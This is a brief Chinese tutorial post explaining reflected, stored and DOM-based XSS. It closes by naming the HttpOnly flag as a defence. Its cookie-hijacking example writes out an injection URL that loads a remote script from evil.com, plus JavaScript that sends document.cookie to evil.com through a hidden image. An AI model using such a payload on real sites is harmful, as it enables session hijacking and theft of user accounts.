XSS(Cross Site Script)
Posted lwfiwo
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS(Cross Site Script)相关的知识,希望对你有一定的参考价值。
类型一:反射型XSS
简单地把用户输入的数据“反射”给浏览器。也就是说,黑客需要诱使用户“点击”一个恶意链接,才能攻击成功。
类型二:存储型XSS
把用户输入的数据“存储”在服务器端。这种XSS具有很强的稳定性。
类型三:DOM Based XSS
通过修改页面DOM节点形成的XSS,称之为DOM Based XSS。
XSS Payload:
XSS攻击成功后,攻击者能够对用户当前浏览的页面植入恶意脚本,通过恶意脚本,控制用户的浏览器。这些完成各种具体功能的恶意脚本,被称为”XSS Payload“。
XSS Payload实际上就是javascript脚本。
Cookie劫持案例:
http://www.a.com/test.htm?abc="><script src=http://www.evil.com/evil.js></script>
Payload写在这个远程脚本中,避免直接在URL的参数里写入大量的JavaScript代码。在evil.js中,可通过如下代码窃取Cookie:
var img = document.createElement("img"); img.src = "http://www.evil.com/log?"+escape(document.cookie); document.body.appendChild(img);
这段代码在页面插入了一张看不见的图片,同时把document.cookie对象作为参数发送到远程服务器。
Cookie的”HttpOnly“标识可以防止”Cookie劫持“。
以上是关于XSS(Cross Site Script)的主要内容,如果未能解决你的问题,请参考以下文章
SeedLab - Cross-Site Scripting Attack
防止恶意代码注入XSS(cross site scripting)
DVWA 黑客攻防实战反射型 XSS 攻击 Reflected Cross Site Scripting